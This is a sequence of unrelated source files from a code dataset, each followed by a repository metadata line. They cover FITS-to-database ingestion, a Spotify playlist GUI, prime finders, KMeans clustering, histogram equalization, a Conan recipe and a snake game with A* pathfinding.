            "e_vsini": float,
        }
        # Update formats, as necessary.
        # Each column is copied into a temporary column with the target dtype,
        # then renamed back so astropy's Table carries the adapted types.
        tmp_key_format = "{}_NEW_DTYPE"
        for key, new_dtype in fits_format_adapters.items():
            data[tmp_key_format.format(key.upper())] = np.array(data[key.upper()], dtype=new_dtype)
            del data[key.upper()]
            data.rename_column(tmp_key_format.format(key.upper()), key.upper())
        N = len(data)
        for i, row in enumerate(data):
            logger.info("Ingesting row {}/{} from node WG{}: {}".format(i, N,
                wg, node_name))
            row_data = {}
            row_data.update(default_row)
            # columns[0] is node_id, which comes from default_row.
            row_data.update(dict(zip(columns[1:], [row[c.upper()] for c in columns[1:]])))
            self.execute(
                "INSERT INTO results ({}) VALUES ({})".format(
                    ", ".join(columns),
                    ", ".join(["%({})s".format(column) for column in columns])),
                row_data)
        self.connection.commit()
        return N
    def ingest_spectra_masterlist(self, filename, extension=-1):
        """
        Ingest a master list of spectra from a FITS template file into the
        spectra table.
        :param filename:
            A FITS template file that contains the masterlist of all spectra.
        :returns:
            The number of rows inserted.
        """
        image = fits.open(filename)
        data = image[extension].data
        # Create mapper between FITS and database columns.
        columns = ("cname", "ges_fld", "object", "filename", "ges_type", "setup",
            "wg", "instrument", "ra", "dec", "snr", "vel", "e_vel", "vrot",
            "e_vrot", "teff_irfm", "e_teff_irfm", "peculi", "remark", "tech")
        # FITS header names that differ from the database column names.
        fits_column_adapters = {
            "instrument": "instrume"
        }
        fits_format_adapters = {
            "wg": utils.safe_int,
            "ra": float,
            "dec": float,
            "snr": float,
            "vel": float,
            "e_vel": float,
            "vrot": float,
            "e_vrot": float,
            "teff_irfm": float,
            "e_teff_irfm": float,
        }
        N = len(data)
        for i, row in enumerate(data):
            logger.info("Inserting row {}/{}".format(i, N))
            values = []
            for col in columns:
                use_col = fits_column_adapters.get(col, col)
                value = row[use_col]
                # Formatting.
                if col in fits_format_adapters:
                    f = fits_format_adapters[col]
                    value = f(value)
                values.append(value)
            self.execute(
                "INSERT INTO spectra ({}) VALUES ({})".format(
                    ", ".join(columns), ", ".join(["%s"] * len(columns))),
                values)
        self.connection.commit()
        return N
    def ingest_magrini_photometric_temperatures(self, filename, extension=-1):
        """
        Ingest a FITS table containing CNAMEs and photometric temperatures,
        updating spectra rows whose teff_irfm is still 'NaN'.
        :param filename:
            A FITS table.
        :param extension: [optional]
            The HDU extension that contains the photometric temperatures.
        """
        image = fits.open(filename)
        data = image[extension].data
        # The columns might be different, but in general if we lowerize them all
        # then we are looking for:
        # ('CNAME_2', 'GES_FLD', 'teffjk', 'jk', 'FILENAME')
        cname_col, teff_col = (data.dtype.names[0], "teffjk")
        # Update the value in the spectra table, unless it already exists.
        # NOTE(review): ``N`` and ``result`` are assigned but never used, and
        # no commit is issued here — presumably the caller commits; verify.
        N = 0
        for row in data:
            result = self.execute(
                """ UPDATE spectra
                    SET teff_irfm = %s
                    WHERE cname = %s AND
                          teff_irfm = 'NaN'""",
                (float(row[teff_col]), row[cname_col], ))
        return True
class UnknownNodeError(Exception):
    """Raised when a (wg, node_name) pair does not exist in the nodes table.

    Fix: inherit from Exception rather than BaseException so that generic
    ``except Exception`` handlers can catch it, per Python convention
    (BaseException is reserved for exits like KeyboardInterrupt/SystemExit).
    Existing ``except UnknownNodeError`` handlers are unaffected.
    """
    pass
| andycasey/ges-idr5 | code/gesdb.py | gesdb.py | py | 10,196 | python | en | code | 0 | github-code | 90 |
73909413415 | # Import
import json
import PySimpleGUI as sg
import spotipy
from spotipy.oauth2 import SpotifyOAuth
# Main windows
def windows_main():
    """Main GUI flow: refresh/load Spotify data, then show a browser window.

    First shows a small window offering either to re-fetch liked tracks and
    playlists from Spotify (writing them to .txt files) or to reuse the
    cached files, then opens a PySimpleGUI file-browser-style window.
    """
    # Windows to update all
    def windows_update_all():
        """
        TODO Add a "try" for create a "APP_CLIENT_ID.txt" and "APP_CLIENT_SECRET.txt" if is not valid
        export SPOTIPY_CLIENT_ID='your-spotify-client-id'
        export SPOTIPY_CLIENT_SECRET='your-spotify-client-secret'
        """
        def spotify_authentication():
            # Import APP_CLIENT_ID and SECRET
            # NOTE(review): file handles are never closed; the raw file
            # contents (including any trailing newline) are used verbatim.
            f_APP_CLIENT_ID = open('APP_CLIENT_ID.txt', 'r')
            APP_CLIENT_ID = f_APP_CLIENT_ID.read()
            f_APP_CLIENT_SECRET = open('APP_CLIENT_SECRET.txt', 'r')
            APP_CLIENT_SECRET = f_APP_CLIENT_SECRET.read()
            APP_CLIENT_LINK = 'http://localhost/'
            APP_CLIENT_SCOPE = 'playlist-read-private user-library-read'
            # OAUTH
            sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id=APP_CLIENT_ID,
                                                           client_secret=APP_CLIENT_SECRET,
                                                           redirect_uri=APP_CLIENT_LINK,
                                                           scope=APP_CLIENT_SCOPE))
            return sp
        # All liked track
        def results_all_liked_track(sp):
            # Parameters
            limit_liked_track = 50
            offset_liked_track = 0
            last_liked_track = False
            old_results_liked_track = sp.current_user_saved_tracks()
            last_id_liked_track = (old_results_liked_track['total'] - 1)
            # Truncate the cache file before appending pages below.
            file_results_all_liked_track = open("results_all_liked_track.txt", "w")
            file_results_all_liked_track.write('')
            file_results_all_liked_track.close()
            # List of all liked track
            results_all_liked_track = []
            # Page through the saved-tracks endpoint 50 items at a time.
            while not last_liked_track:
                file_results_all_liked_track = open("results_all_liked_track.txt", "a")
                for item in sp.current_user_saved_tracks(limit_liked_track, offset_liked_track)['items']:
                    results_all_liked_track.append(item)
                    file_results_all_liked_track.write(json.dumps(item) + '\n')
                    print(item['added_at'] + ' - ' + item['track']['name'] + ' - ALBUM : ' + item['track']['album'][
                        'name'] + ' - ARTIST : ' + item['track']['artists'][0]['name'] + ' - ID : ' + item['track'][
                        'id'])
                offset_liked_track = offset_liked_track + limit_liked_track
                last_liked_track = (offset_liked_track >= last_id_liked_track)
                file_results_all_liked_track.close()
            return results_all_liked_track
        # * All playlist user
        def results_all_playlist_user(sp):
            # * Parametres
            last_playlist_user = 'FALSE'
            limit_playlist_user = 50
            offset_playlist_user = 0
            old_results_playlist_user = sp.current_user_playlists()
            last_id_playlist_user = (old_results_playlist_user['total'] - 1)
            # * List of all liked track
            results_all_playlist_user = []
            # Page through the playlists endpoint until all are collected.
            while not last_playlist_user == 'TRUE':
                for item in sp.current_user_playlists(limit_playlist_user, offset_playlist_user)['items']:
                    results_all_playlist_user.append(item)
                    print(item['name'] + ' - ID : ' + item['id'])
                offset_playlist_user = offset_playlist_user + limit_playlist_user
                if offset_playlist_user >= last_id_playlist_user:
                    last_playlist_user = 'TRUE'
            return results_all_playlist_user
        layout = [[sg.Button('Update Spotify info in .txt files'), sg.Exit('Use the .txt files')]]
        window = sg.Window('ListoFy update').Layout(layout)
        while True:
            event, values = window.Read()
            if event in (None, 'Use the .txt files'):
                try:
                    file_results_all_liked_track = open("results_all_liked_track.txt", "r")
                    results_all_liked_track = file_results_all_liked_track.readlines()
                except:
                    print('error')
                # NOTE(review): in this branch results_all_playlist_user is
                # never assigned, so the return below raises NameError.
                break
            if event == 'Update Spotify info in .txt files':
                sp = spotify_authentication()
                # NOTE(review): this rebinds the local function names to their
                # results, shadowing the functions after the first call.
                results_all_liked_track = results_all_liked_track(sp)
                results_all_playlist_user = results_all_playlist_user(sp)
                break
        window.Close()
        return results_all_playlist_user, results_all_liked_track
    results = windows_update_all()
    file_list_column = [
        [
            sg.Button(button_text="Liked"),
            sg.Button(button_text="Playlist", enable_events=True),
        ],
        [
            sg.Listbox(
                values=[], enable_events=True, size=(40, 20), key="-FILE LIST-"
            )
        ],
    ]
    # For now will only show the name of the file that was chosen
    image_viewer_column = [
        [sg.Text(size=(40, 1), key="-TOUT-")],
        [sg.Image(key="-IMAGE-")],
    ]
    # -- -- - Full layout -- -- -
    layout = [
        [
            sg.Column(file_list_column),
            sg.VSeperator(),
            sg.Column(image_viewer_column),
        ]
    ]
    window = sg.Window("Image Viewer", layout)
    # Run the Event Loop
    while True:
        event, values = window.read()
        if event == "Exit" or event == sg.WIN_CLOSED:
            break
        # Folder name was filled in, make a list of files in the folder
        # NOTE(review): the ``os`` module is never imported in this file, so
        # this branch would raise NameError if a "-FOLDER-" event ever fired
        # (no -FOLDER- element exists in the layout either).
        if event == "-FOLDER-":
            folder = values["-FOLDER-"]
            try:
                # Get list of files in folder
                file_list = os.listdir(folder)
            except:
                file_list = []
            fnames = [
                f
                for f in file_list
                if os.path.isfile(os.path.join(folder, f))
                and f.lower().endswith((".png", ".gif"))
            ]
            window["-FILE LIST-"].update(fnames)
        elif event == "-FILE LIST-": # A file was chosen from the listbox
            try:
                filename = os.path.join(
                    values["-FOLDER-"], values["-FILE LIST-"][0]
                )
                window["-TOUT-"].update(filename)
                window["-IMAGE-"].update(filename=filename)
            except:
                pass
    window.close()
# Create an event loop
# NOTE(review): ``window`` was local to windows_main(), so this module-level
# loop raises NameError when reached; it looks like leftover template code.
while True:
    event, values = window.read()
    # End program if user closes window or
    # presses the OK button
    if event == "OK" or event == sg.WIN_CLOSED:
        break
window.close()
# * Reload all infos
windows_main()
"""
last_id_playlist_user = 0
while not last_id_playlist_user == len(results_all_playlist_user):
    print(str(last_id_playlist_user) + ' - ' + results_all_playlist_user[last_id_playlist_user]['name'] + ' - ID : ' + results_all_playlist_user[last_id_playlist_user]['id'])
    last_id_playlist_user = last_id_playlist_user+1
in_playlist_use_all = input('What playlist numbers do you use for "ALL" ? "none" for no playlist : ')
"""
print('END')
18296548619 | import sys
# Read one line from standard input and parse it as an int.
def I(): return int(sys.stdin.readline().rstrip())
X = I()
# Print the smallest prime >= X by trial division up to sqrt(i).
for i in range(X,1000000):
    for j in range(2,int(i**.5)+1):
        if i % j == 0:
            break
    else:
        # for/else: no divisor found, so i is prime.
        print(i)
        break
| Aasthaengg/IBMdataset | Python_codes/p02819/s869612331.py | s869612331.py | py | 218 | python | en | code | 0 | github-code | 90 |
69897770856 | import pandas as pd
#import numpy as np
import matplotlib.pyplot as plt
# Load the iris data and drop the label column so clustering is unsupervised.
dataset= pd.read_json('iris.json')
dataset= dataset.drop(columns= 'species')
X= dataset.iloc[:, :].values
# Project the 4 features onto 2 principal components for 2-D plotting.
from sklearn.decomposition import PCA
pca= PCA(n_components= 2)
X= pca.fit_transform(X)
#explained_variance= pca.explained_variance_ratio_
from sklearn.cluster import KMeans
# Elbow method: record within-cluster sum of squares for k = 1..10.
wcss= list()
for i in range(1, 11):
    kmeans= KMeans(n_clusters= i, init= 'k-means++', n_init= 10, max_iter= 300)
    kmeans.fit(X)
    wcss.append(kmeans.inertia_)
plt.plot(range(1, 11), wcss)
plt.title("Elbow Method")
plt.xlabel("Number of Clusters")
plt.ylabel("WCSS")
plt.show()
# Final clustering with k = 3 (the three iris species).
kmeans= KMeans(n_clusters= 3, init= 'k-means++', n_init= 10, max_iter= 300)
y_kmeans= kmeans.fit_predict(X)
# NOTE(review): cluster ids are not deterministic across runs, so the
# species names assigned to labels 1/0/2 below are an assumption — verify.
plt.scatter(X[y_kmeans== 1, 0], X[y_kmeans== 1, 1], c= 'red', s= 100, label= 'setosa')
plt.scatter(X[y_kmeans== 0, 0], X[y_kmeans== 0, 1], c= 'blue', s= 100, label= 'versicolor')
plt.scatter(X[y_kmeans== 2, 0], X[y_kmeans== 2, 1], c= 'yellow', s= 100, label= 'virginica')
plt.title("Iris")
plt.xlabel("PC1")
plt.ylabel("PC2")
plt.legend()
plt.show()
73783290536 | import yaml
import geopy.distance
from pyproj import Proj
def load_yaml(filename):
    """
    Load yaml into python dict
    Parameters
    ----------
    filename: str
        absolute path of .yaml file
    Returns
    -------
    YAML: dict
        Required file, or None when the file is not valid YAML (the parse
        error is printed, not raised).  A missing file still raises OSError.
    """
    with open(filename, "r") as stream:
        try:
            YAML = yaml.safe_load(stream)
            return YAML
        except yaml.YAMLError as exc:
            # Parse failures are swallowed: print and fall through to None.
            print(exc)
    return
def convert_distance(
    distance_unit,
):
    """
    Convert meters into unit of choice.
    Parameters
    ----------
    distance_unit: str
        desired unit ("mi"/"mile"/"miles", "km"/"kilometer"/"kilometers",
        or "m"/"meter"/"meters")
    Returns
    -------
    unit_factor: float
        rescaling factor e.g. x[meters] / unit_factor = y[distance_unit]
    Raises
    ------
    ValueError
        for an unrecognised unit (fix: the original fell through and raised
        a confusing UnboundLocalError instead).
    """
    if distance_unit in ["mi", "mile", "miles"]:
        unit_factor = 1609.34
    elif distance_unit in ["km", "kilometer", "kilometers"]:
        unit_factor = 1000.0
    elif distance_unit in ["m", "meter", "meters"]:
        unit_factor = 1.0
    else:
        raise ValueError("Unknown distance unit: {!r}".format(distance_unit))
    return unit_factor
def get_units(
    distance_unit
):
    """
    Get the short plotting label for a unit of distance.
    Parameters
    ----------
    distance_unit: str
        unit of distances
    Returns
    -------
    distance_unit: str
        "mi", "km" or "m" for recognised names; unrecognised names are
        returned unchanged.
    """
    aliases = {
        "mi": ["mi", "mile", "miles"],
        "km": ["km", "kilometer", "kilometers"],
        "m": ["m", "meter", "meters"],
    }
    for label, names in aliases.items():
        if distance_unit in names:
            return label
    return distance_unit
def format_date_string(
    date
):
    """
    Get plotting representation for the date, e.g. "1st January 2021".
    Parameters
    ----------
    date: datetime.date or datetime.datetime
        A date
    Returns
    -------
    date: str
        plotting date with an ordinal day suffix
    Fixes over the original: the leading-zero strip compared a string
    character to the int 0 (never true, so "01st" was produced), and
    the 11th/12th/13th received "st"/"nd"/"rd" instead of "th".
    """
    day_num = date.strftime('%d')
    month_str = date.strftime('%B')
    year = date.strftime('%Y')
    # Strip a leading zero from the day ("01" -> "1").
    if day_num[0] == '0':
        day_num = day_num[1:]
    # 11, 12 and 13 are irregular; otherwise the suffix follows the last digit.
    if day_num in ('11', '12', '13'):
        super_str = "th"
    elif day_num[-1] == "1":
        super_str = "st"
    elif day_num[-1] == "2":
        super_str = "nd"
    elif day_num[-1] == "3":
        super_str = "rd"
    else:
        super_str = "th"
    return f"{day_num}{super_str} {month_str} {year}"
def calculate_distance(coords_1, coords_2):
    """
    Calculate the geodesic distance between two coordinates
    Parameters
    ----------
    coords_1: coordinates class
        First coordinate class
    coords_2: coordinates class
        Second coordinate class
    Returns
    -------
    D: float
        distance between coordinates in miles
    """
    # NOTE(review): geopy.distance.distance expects (latitude, longitude)
    # pairs, but (long, lat) is passed here — confirm whether the Coords
    # attributes are intentionally swapped or this is a bug.
    D = geopy.distance.distance([coords_1.long,coords_1.lat],[coords_2.long,coords_2.lat]).miles
    return D
def latlong_to_proj(crs, long,lat):
    """
    Convert lat long coordinates into coordinates in new projection
    Parameters
    ----------
    crs: str
        coordinate reference system (e.g. "EPSG:3857")
    long: float
        longitude value
    lat: float
        latitude value
    Returns
    -------
    proj: tuple
        (x, y) coordinates in the target projection, as returned by
        calling the pyproj.Proj transformer on (long, lat)
    """
    return Proj(crs)(long,lat)
class Coords:
    def __init__(
        self,
        lat = 0,
        long = 0
    ):
        """
        Class defining a set of coordinates.  Stores the raw lat/long and
        also precomputes the Web-Mercator (EPSG:3857) projection as x/y.
        Parameters
        ----------
        lat: float
            latitude value
        long: float
            longitude value
        """
        self.lat = lat
        self.long = long
        x1,y1 = latlong_to_proj("EPSG:3857", long, lat) #Into Mercator
        self.x = x1
        self.y = y1
17983505249 | n,m=map(int,input().split())
# Count arrangements of n of one kind and m of the other in a strict
# alternation, modulo 1e9+7: possible only when |n - m| <= 1.
mod=10**9+7
nkai=1
mkai=1
# n! mod p and m! mod p, reduced at every step to keep values small.
for i in range(1,n+1):
    nkai*=(i%mod)
    nkai=(nkai%mod)
for i in range(1,m+1):
    mkai*=(i%mod)
    mkai=(mkai%mod)
if abs(n-m)>=2:
    # Alternation impossible.
    print(0)
elif abs(n-m)==1:
    # The longer group must start: n! * m! orderings.
    print((mkai*nkai)%mod)
elif abs(n-m)==0:
    # Either group may start: 2 * n! * m! orderings.
    print((mkai*nkai*2)%mod)
1691097915 | from cmd import Cmd
class MyPrompt(Cmd):
    """Minimal interactive cmd.Cmd shell with 'hello' and 'quit' commands."""
    def do_hello(self, args):
        """Says hello. If you provide a name, it will greet you with it."""
        # cmd passes the argument tail as a single string; empty means no name.
        if len(args) == 0:
            name = 'stranger'
        else:
            name = args
        print("Hello, " + name)
    def do_quit(self, args):
        """Quits the program."""
        print("Quitting.")
        # SystemExit ends cmdloop() and the process.
        raise SystemExit
# Start the interactive prompt loop when run as a script.
if __name__ == '__main__':
    prompt = MyPrompt()
    prompt.prompt = '> '
    prompt.cmdloop('Starting prompt...')
22139237672 | import cv2
import numpy as np
import matplotlib.pyplot as plt
# Input image for the demo at the bottom of the file (BGR, as loaded by OpenCV).
img = cv2.imread('C:/Users/TOBI/Documents/Belajar_Python/PCD_prak/p3/car.png')
def img_to_hist(name, image):
    """Show a 256-bin intensity histogram of ``image`` in a window titled ``name``."""
    plt.figure(name)
    plt.title(name)
    plt.hist(image.ravel(), 256, [0,256])
    # plt.savefig('{}.png'.format(name.lower()))
    return plt.show()
def list_to_hist(name, list):
    """Show a bar chart of a 256-element list (one bar per intensity bin)."""
    # NOTE: parameter name shadows the builtin ``list``; kept for compatibility.
    bin = [i for i in range(0, 256)]
    plt.figure(name)
    plt.title(name)
    plt.bar(bin, list)
    # plt.savefig('{}.png'.format(name.lower()))
    return plt.show()
def contrastStretching(image):
    """Linearly rescale a 2-D grayscale image so its values span 0..255.

    Returns a new uint8 array of shape (rows, cols, 1); the input array is
    left untouched.  Requires the image to contain at least two distinct
    intensity values (otherwise the divisor is zero).
    """
    rows, cols = image.shape
    stretched = np.zeros((rows, cols, 1), np.uint8)
    lo = min(image.ravel())
    hi = max(image.ravel())
    span = hi - lo
    for r in range(rows):
        for c in range(cols):
            # Float result is truncated on assignment into the uint8 canvas.
            stretched[r, c] = ((image[r, c] - lo) / span) * 255
    return stretched
def jmlKemunculan(image):
    """Return a 256-bin list counting each pixel intensity of a 2-D image."""
    height, width = image.shape
    counts = [0] * 256
    for y in range(height):
        for x in range(width):
            counts[image[y, x]] += 1
    return counts
def normalize(kemunculan, image):
    """Convert a 256-bin count histogram into per-bin probabilities.

    The divisor is the total pixel count taken from ``image.shape``.
    """
    height, width = image.shape
    total = height * width
    return [kemunculan[index] / total for index in range(256)]
def kumulatifSum(normalisasi):
    """Return the running (cumulative) sum over the first 256 histogram bins."""
    running = 0
    cumulative = []
    for index in range(256):
        running += normalisasi[index]
        cumulative.append(running)
    return cumulative
def equalized(kumulatif, image):
    """Apply a histogram-equalization mapping to ``image`` in place.

    WARNING: mutates BOTH arguments — ``kumulatif`` is scaled to 0..255 and
    every pixel of ``image`` is replaced through that lookup table.  The
    (mutated) image is also returned for convenience.
    """
    row, col = image.shape
    # Scale the cumulative distribution into the 0..255 intensity range.
    for i in range(0, 256):
        kumulatif[i] = kumulatif[i] * 255
    # Remap each pixel through the scaled CDF.
    for i in range(row):
        for j in range(col):
            image[i, j] = kumulatif[image[i, j]]
    return image
def histogramEqualization(image):
    """Full histogram-equalization pipeline: count, normalize, cumulate, remap.

    Returns (normalized histogram, scaled cumulative histogram, equalized
    image).  Note that ``image`` itself is modified in place by equalized().
    """
    kemunculan = jmlKemunculan(image)
    normalisasi = normalize(kemunculan, image)
    kumulatif = kumulatifSum(normalisasi)
    ekualisasi = equalized(kumulatif, image)
    return normalisasi, kumulatif, ekualisasi
def bgr2gray(img):
    """Convert an OpenCV-style BGR image (H, W, 3) to a float grayscale array.

    Uses the ITU-R 601 luma weights (0.299 R + 0.587 G + 0.114 B); channel 0
    is blue because OpenCV loads images in B, G, R order.
    """
    blue = img[:,:,0]
    green = img[:,:,1]
    red = img[:,:,2]
    return 0.114 * blue + 0.587 * green + 0.299 * red
# Demo: equalize the loaded car image and display it until a key is pressed.
gray_img = bgr2gray(img)
normalisasi, kumulatif, ekualisasi = histogramEqualization(gray_img)
cv2.imshow("Hasil histogram equalization", ekualisasi)
cv2.waitKey(0)
29597822265 | #!/usr/bin/python3
"""
A module for working with lockboxes.
"""
def canUnlockAll(boxes):
    """Return True when every box is reachable starting from box 0.

    ``boxes[i]`` lists the keys found inside box i; box 0 starts open.
    Performs an iterative depth-first traversal over the key graph, ignoring
    keys that do not correspond to any box.
    """
    total = len(boxes)
    opened = {0}
    to_visit = [0]
    while to_visit:
        current = to_visit.pop()
        for key in boxes[current]:
            if 0 <= key < total and key not in opened:
                opened.add(key)
                to_visit.append(key)
    return len(opened) == total
| 8srael/alx-interview | 0x01-lockboxes/0-lockboxes.py | 0-lockboxes.py | py | 469 | python | en | code | 0 | github-code | 90 |
19985427455 | #!/usr/bin/env python3
from conans import ConanFile, CMake
class AlloyConan(ConanFile):
    """Conan package recipe for the Alloy game engine (CMake-based build)."""
    # Package Info
    name = "Alloy"
    version = "0.1.0"
    description = "A game engine"
    url = "https://github.com/bitwizeshift/Alloy"
    author = "Matthew Rodusek <matthew.rodusek@gmail.com>"
    license = "MIT"
    # Sources
    exports = ("LICENSE",
               "doc/licenses")
    exports_sources = ( "lib/*",
                        "bin/*",
                        "extra/*",
                        "cmake/*",
                        "doc/*",
                        "CMakeLists.txt",
                        "LICENSE" )
    # Settings
    settings = "os", "compiler", "build_type", "arch"
    options = {
        "install_docs" : [True,False],
        "shared" : [True,False],
        "extras" : [True,False],
        "examples" : [True,False],
        "exceptions" : [True,False],
        "precision" : ["float", "double"]
    }
    default_options = {
        "install_docs" : False,
        "shared" : False,
        "extras" : False,
        "examples" : False,
        "exceptions" : True,
        "precision" : "float"
    }
    generators = "cmake"
    # Dependencies
    # NOTE(review): this is a parenthesised string, not a one-element tuple
    # (missing trailing comma) — confirm Conan accepts the plain string form.
    build_requires = ("Catch2/2.7.1@catchorg/stable")
    # requires = ("SDL/2.0.9@/stable")
    def requirements(self):
        # fmt is only needed when the optional "extras" component is built.
        if self.options.extras:
            self.requires("fmt/5.3.0@bincrafters/stable", "private")
    def imports(self):
        # Puts the licenses of all dependencies into the install directory
        self.copy(pattern="licenses", dst="licenses", folder=True, ignore_case=True)
    def configure_cmake(self):
        """Create a CMake helper with all option-derived cache definitions set."""
        cmake = CMake(self)
        # Features
        cmake.definitions["ALLOY_COMPILE_SELF_CONTAINMENT_TESTS"] = "ON"
        cmake.definitions["ALLOY_COMPILE_TESTS"] = "OFF"
        cmake.definitions["ALLOY_COMPILE_EXTRAS"] = "ON" if self.options.extras else "OFF"
        cmake.definitions["ALLOY_COMPILE_EXAMPLES"] = "ON" if self.options.examples else "OFF"
        cmake.definitions["ALLOY_GENERATE_DOCS"] = "ON" if self.options.install_docs else "OFF"
        cmake.definitions["ALLOY_INSTALL_DOCS"] = "ON" if self.options.install_docs else "OFF"
        # ABI
        cmake.definitions["BUILD_SHARED_LIBS"] = "ON" if self.options.shared else "OFF"
        cmake.definitions["ALLOY_ENABLE_EXCEPTIONS"] = "ON" if self.options.exceptions else "OFF"
        cmake.definitions["ALLOY_PRECISION"] = self.options.precision
        cmake.configure()
        return cmake
    def build(self):
        cmake = self.configure_cmake()
        cmake.build()
        # cmake.test()
        # if we are installing documentation, it needs to be generated
        if self.options.install_docs:
            cmake.build(target="AlloyDocs")
    def package(self):
        cmake = self.configure_cmake()
        cmake.install()
        # Copy this library's license, and
        # all dependencies' licenses
        self.copy(pattern="LICENSE", dst="licenses")
        self.copy(pattern="doc/licenses/*", dst="licenses")
    def package_id(self):
        # No customisation: the default package id computation is used.
        pass
18296354939 | X = int(input())
# It suffices to test candidates for primality in increasing order from X.
def is_prime(x):
    """Return True when ``x`` is a prime number.

    Values <= 1 are not prime.  Improvement: trial division only runs up to
    sqrt(x) and skips even divisors (the original tested every integer
    below x, O(x) per call).
    """
    if x <= 1:
        return False
    if x % 2 == 0:
        # 2 is the only even prime.
        return x == 2
    for divisor in range(3, int(x ** 0.5) + 1, 2):
        if x % divisor == 0:
            return False
    return True
# Scan upwards from X and print the smallest prime >= X.
p = X
while not is_prime(p):
    p += 1
print(p)
def even_list(s):
    """Print every word of ``s`` (split on single spaces) whose length is even."""
    words = s.split(' ')
    even_words = [word for word in words if len(word) % 2 == 0]
    for word in even_words:
        print(word)
# Demo 1: print the even-length names.
s = "bob jimmy baxb bernie bordan futurehendrix"
even_list(s)
# Demo 2: collect the odd-length names into a list and print them.
test_str = "cob cimmy maxb bernie jordan cuturehendrix"
res = []
for ele in test_str.split():
    if len(ele) % 2:
        res.append(ele)
print("The odd length names are : " + str(res))
41089112217 |
import pygame
from random import randint
import time
Xa=60
Ya=120
grid = []
class NoD(object):
    """A* pathfinding node on the game grid.

    Attributes: (x, y) grid position; gCost/hCost path-cost components;
    Padre, the parent node used for path reconstruction; Ve, the neighbour
    list; Wal, the cell type (3 marks a wall elsewhere in this file).
    """
    def __init__(self, x, y, Wal):
        self.x = x
        self.y = y
        self.gCost = 0
        self.hCost = 0
        self.Padre = None
        self.Ve = []
        self.Wal = Wal
    def fCost(self):
        """Return the total estimated cost g + h, truncated to an int."""
        return int(self.gCost + self.hCost)
    def Rve(self):
        """Return the neighbour list.

        Fix: the original signature omitted ``self``, so any call raised
        TypeError.
        """
        return self.Ve
def regreso(Ini, Fin):
    """Rebuild the path from ``Ini`` to ``Fin`` by following parent links.

    Walks ``Padre`` pointers backwards from the goal and returns the nodes
    in start-to-goal order; the start node ``Ini`` itself is excluded.
    """
    backwards = []
    node = Fin
    while node != Ini:
        backwards.append(node)
        node = node.Padre
    return backwards[::-1]
def Ia(Ini, Fin):
    """A* search from node ``Ini`` to node ``Fin`` over the NoD graph.

    Uses each node's Ve neighbour list; nodes with Wal == 3 are walls.
    Mutates gCost/hCost/Padre on visited nodes and returns the path (via
    regreso) when the goal is reached, or None if no path exists.
    """
    Nini=Ini
    Nfin=Fin
    Lopen=[]
    Lclose=[]
    Lopen.append(Nini)
    while len(Lopen):
        # Pick the open node with the lowest fCost (ties broken by hCost).
        current = Lopen[0]
        for nodo in Lopen:
            nodoF=nodo.fCost()
            currentF=current.fCost()
            if nodoF < currentF or nodoF == currentF and nodo.hCost < current.hCost:
                current = nodo
        Lopen.remove(current)
        Lclose.append(current)
        if current == Nfin:
            # Goal reached: reconstruct the path through the Padre links.
            a = []
            a = regreso(Nini,Nfin)
            return a
        for nodo in current.Ve:
            # Skip closed nodes and walls.
            if nodo in Lclose or nodo.Wal==3:
                continue
            nuevoCosto=current.gCost+dist(current,nodo)
            # Relax: adopt the cheaper route through ``current``.
            if nodo not in Lopen or nuevoCosto < nodo.gCost:
                nodo.gCost = nuevoCosto
                nodo.hCost = dist(nodo,Nfin)
                nodo.Padre = current
                if nodo not in Lopen:
                    Lopen.append(nodo)
def dist(Ini, Fin):
    """Manhattan distance between two nodes carrying .x and .y attributes."""
    return abs(Ini.x - Fin.x) + abs(Ini.y - Fin.y)
class Comida:
    """Food pellet position on the grid; coordinates are truncated to int."""
    def __init__(self, x, y):
        self.x = int(x)
        self.y = int(y)
class Nodo:
    """One snake body segment.

    The head is constructed with lead == "SI"; every other segment follows
    its ``padre`` (the segment directly in front of it).
    """
    def __init__(self, x, y, lead):
        self.x = int(x)
        self.y = int(y)
        self.leader = lead
        self.padre = None
    def addp(self, nod):
        """Attach ``nod`` as the segment this one follows."""
        self.padre = nod
    def up(self):
        """Move a non-head segment onto its parent's current position."""
        if self.leader != "SI":
            self.x = self.padre.x
            self.y = self.padre.y
class Snake:
    """The snake: a list of Nodo segments plus a movement direction.

    Coordinates wrap around the Xa x Ya module-level grid.  Directions:
    "AR" up (x-1), "DW" down (x+1), "LF" left (y-1), "RG" right (y+1).
    """
    def __init__(self,color):
        # Random start position, kept away from the far edges.
        x=randint(0,Xa-5)
        y=randint(0,Ya-5)
        cab=Nodo(x,y,"SI")
        pri=Nodo(x,y+1,"NO")
        pri.addp(cab)
        sec=Nodo(x,y+2,"NO")
        sec.addp(pri)
        self.lis=[]
        self.lis.append(cab)
        # NOTE(review): this attribute shadows the ``dir`` method below, so
        # Snake.dir(...) is unreachable on instances — confirm intent.
        self.dir="AR"
        self.color=color
        self.lis.append(pri)
        self.lis.append(sec)
    def lsn(self):
        """Return the segment list (head first)."""
        return self.lis
    def add(self, nod):
        """Append a pre-built segment to the tail."""
        self.lis.append(nod)
    def dir(self, nu):
        # Shadowed by the instance attribute set in __init__ (see note above).
        self.dir=nu
    def comer(self):
        """Grow by one: duplicate the tail segment and chain it behind."""
        mnodo=Nodo(self.lis[-1].x, self.lis[-1].y,"NO")
        mnodo.addp(self.lis[-1])
        self.lis.append(mnodo)
    def imp(self,grid):
        """Mark all segments of the snake as 1 in ``grid``."""
        for Nod in self.lis:
            grid[Nod.x][Nod.y]=1
    def lim(self,grid):
        """Clear all segments of the snake (set 0) in ``grid``."""
        for Nod in self.lis:
            grid[Nod.x][Nod.y]=0
    def mov(self):
        """Advance one step: body follows the head, head moves with wrap-around."""
        # Update from tail to head so each segment copies its parent's old spot.
        for nod in reversed(self.lis):
            nod.up()
        if self.dir=="AR":
            if self.lis[0].x!=0:
                self.lis[0].x-=1
            else:
                self.lis[0].x=Xa-1
        if self.dir=="RG":
            if self.lis[0].y!=Ya-1:
                self.lis[0].y+=1
            else:
                self.lis[0].y=0
        if self.dir=="DW":
            if self.lis[0].x!=Xa-1:
                self.lis[0].x+=1
            else:
                self.lis[0].x=0
        if self.dir=="LF":
            if self.lis[0].y!=0:
                self.lis[0].y-=1
            else:
                self.lis[0].y=Ya-1
def Ia2(Sn,Path,dele):
    """Point snake Sn toward the first waypoint in Path.

    The first four branches handle the torus wrap-around (head and waypoint
    on opposite edges); the remaining four handle ordinary straight-line
    movement. When dele is true, the waypoint is consumed from Path.

    NOTE(review): raises IndexError when Path is empty -- the respawn loop
    in the main program relies on that to validate a freshly computed path.
    """
